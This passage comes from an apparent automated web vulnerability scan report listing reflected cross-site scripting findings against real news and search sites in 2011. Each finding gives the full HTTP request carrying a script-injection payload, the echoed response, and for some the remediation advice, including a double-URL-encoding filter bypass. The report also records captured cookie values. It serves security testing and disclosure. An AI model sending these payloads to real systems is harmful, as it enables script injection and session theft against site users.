<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea ...[SNIP]... ROLLING=no BORDERCOLOR="#000000" '+ 'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottomb9bf9</script><script>alert(1)</script>cc94f26ced5!Top"> ...[SNIP]...
4.78. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bh.heraldinteractive.com |
| Path: | /includes/processAds.bg |
Issue detail
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 431a4"><script>alert(1)</script>498ee9cb580 was submitted in the companion parameter. This input was echoed as 431a4\"><script>alert(1)</script>498ee9cb580 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom431a4"><script>alert(1)</script>498ee9cb580&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:36 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2118
Connection: close
Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom431a4\"><script>alert(1)</script>498ee9cb580!Top"> ...[SNIP]...
4.79. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bh.heraldinteractive.com |
| Path: | /includes/processAds.bg |
Issue detail
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 was submitted in the page parameter. This input was echoed as 4cfbf';alert(1)//04fb34becb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2022
Connection: close
Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea ...[SNIP]... 'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+ 'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home4cfbf';alert(1)//04fb34becb4@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top"> ...[SNIP]...
4.80. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bh.heraldinteractive.com |
| Path: | /includes/processAds.bg |
Issue detail
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97e2b"><script>alert(1)</script>d1318e1e89 was submitted in the page parameter. This input was echoed as 97e2b\"><script>alert(1)</script>d1318e1e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home97e2b"><script>alert(1)</script>d1318e1e89 HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:43 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2112
Connection: close
Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home97e2b\"><script>alert(1)</script>d1318e1e89@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top"> ...[SNIP]...
4.81. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bh.heraldinteractive.com |
| Path: | /includes/processAds.bg |
Issue detail
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cb2a</script><script>alert(1)</script>60f4c826daf was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top2cb2a</script><script>alert(1)</script>60f4c826daf&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:29 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2149
Connection: close
Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea ...[SNIP]... ING=no BORDERCOLOR="#000000" '+ 'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top2cb2a</script><script>alert(1)</script>60f4c826daf"> ...[SNIP]...
4.82. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bh.heraldinteractive.com |
| Path: | /includes/processAds.bg |
Issue detail
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a42"><script>alert(1)</script>f1bf5dd16e2 was submitted in the position parameter. This input was echoed as 29a42\"><script>alert(1)</script>f1bf5dd16e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top29a42"><script>alert(1)</script>f1bf5dd16e2&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:23 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2113
Connection: close
Content-Type: text/html
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top29a42\"><script>alert(1)</script>f1bf5dd16e2"> ...[SNIP]...
4.83. http://blekko.com/autocomplete [query parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://blekko.com |
| Path: | /autocomplete |
Issue detail
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a4d93<script>alert(1)</script>c705977927c was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?query=raa4d93<script>alert(1)</script>c705977927c HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:44:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Sat, 17 Sep 2011 07:44:24 GMT
Vary: Accept-Encoding
Content-Length: 72
X-Blekko-PT: 93cfc820c49a41f46623c49ee1de1a1a
{"suggestions":[],"query":"raa4d93<script>alert(1)</script>c705977927c"}
4.84. http://bostonherald.com/includes/processAds.bg [companion parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://bostonherald.com |
| Path: | /includes/processAds.bg |
Issue detail
The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8eb5"><script>alert(1)</script>ac50390d5f8 was submitted in the companion parameter. This input was echoed as b8eb5\"><script>alert(1)</script>ac50390d5f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottomb8eb5"><script>alert(1)</script>ac50390d5f8&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2082
Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottomb8eb5\"><script>alert(1)</script>ac50390d5f8!Top"> ...[SNIP]...
4.85. http://bostonherald.com/includes/processAds.bg [companion parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://bostonherald.com |
| Path: |
/includes/processAds.bg |
Issue detail
The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 492df</script><script>alert(1)</script>3d2d1682c3d was submitted in the companion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom492df</script><script>alert(1)</script>3d2d1682c3d&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1 Host: bostonherald.com Proxy-Connection: keep-alive Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:12:48 GMT Server: Apache X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 2118 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea ...[SNIP]... R=0 SCROLLING=no BORDERCOLOR="#000000" '+ 'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom492df</script><script>alert(1)</script>3d2d1682c3d!Top"> ...[SNIP]...
4.86. http://bostonherald.com/includes/processAds.bg [page parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bostonherald.com
Path: /includes/processAds.bg
Issue detail
The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c1c0"><script>alert(1)</script>6c55ca82c3b was submitted in the page parameter. This input was echoed as 6c1c0\"><script>alert(1)</script>6c55ca82c3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle6c1c0"><script>alert(1)</script>6c55ca82c3b HTTP/1.1 Host: bostonherald.com Proxy-Connection: keep-alive Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:12:51 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 2082 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article6c1c0\"><script>alert(1)</script>6c55ca82c3b@Top,Right,Middle,Bottom!Top"> ...[SNIP]...
4.87. http://bostonherald.com/includes/processAds.bg [page parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bostonherald.com
Path: /includes/processAds.bg
Issue detail
The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 was submitted in the page parameter. This input was echoed as 8bca3';alert(1)//54aa045dd55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /includes/processAds.bg?position=Top&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle8bca3%2527%253balert%25281%2529%252f%252f54aa045dd55 HTTP/1.1 Host: bostonherald.com Proxy-Connection: keep-alive Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:12:52 GMT Server: Apache X-Powered-By: PHP/5.3.2-1ubuntu4.9 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 1986 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea ...[SNIP]... CE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+ 'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article8bca3';alert(1)//54aa045dd55@Top,Right,Middle,Bottom!Top"> ...[SNIP]...
4.88. http://bostonherald.com/includes/processAds.bg [position parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bostonherald.com
Path: /includes/processAds.bg
Issue detail
The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d9a4"><script>alert(1)</script>5a6cecf4080 was submitted in the position parameter. This input was echoed as 4d9a4\"><script>alert(1)</script>5a6cecf4080 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/processAds.bg?position=Top4d9a4"><script>alert(1)</script>5a6cecf4080&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1 Host: bostonherald.com Proxy-Connection: keep-alive Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:12:40 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 2077 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top4d9a4\"><script>alert(1)</script>5a6cecf4080"> ...[SNIP]...
4.89. http://bostonherald.com/includes/processAds.bg [position parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bostonherald.com
Path: /includes/processAds.bg
Issue detail
The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ffc</script><script>alert(1)</script>2d13a9c6857 was submitted in the position parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/processAds.bg?position=Top95ffc</script><script>alert(1)</script>2d13a9c6857&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle HTTP/1.1 Host: bostonherald.com Proxy-Connection: keep-alive Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 01:12:42 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 2113 Connection: close
<style type="text/css"> /* div { top: 0px; } */ </style>
<!--- 1st Section: Delivery Attempt via JX tag. ---> <SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea ...[SNIP]... SCROLLING=no BORDERCOLOR="#000000" '+ 'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top95ffc</script><script>alert(1)</script>2d13a9c6857"> ...[SNIP]...
4.90. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bostonheraldnie.newspaperdirect.com
Path: /epaper/Services/HomePageHandler.ashx
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b357<script>alert(1)</script>dcde2ff62ac was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=toppictures&datepos=7&language=en&count=20&personalization=0&format=json&callback=HomePageManager.Pictures.DataManager.onDataLoaded7b357<script>alert(1)</script>dcde2ff62ac&swf=true HTTP/1.1 Host: bostonheraldnie.newspaperdirect.com Proxy-Connection: keep-alive Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript; charset=utf-8 Expires: Sat, 17 Sep 2011 01:54:38 GMT Last-Modified: Sat, 17 Sep 2011 01:44:38 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 wc: 1 Date: Sat, 17 Sep 2011 01:44:37 GMT Content-Length: 5965
HomePageManager.Pictures.DataManager.onDataLoaded7b357<script>alert(1)</script>dcde2ff62ac([{id:"47a9b2b0-91be-400a-8f04-6330867a2c04",key:"2abXk7wkLUHesN7z0Gy4qg==",width:718,fpscale:10,type:"pic",article:{id:"e8459750-9218-41e4-8a6d-5bdc7aaad8fa",page:1,title:"HUMAN GUINEA PIGS",rank:4,po ...[SNIP]...
4.91. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
Summary
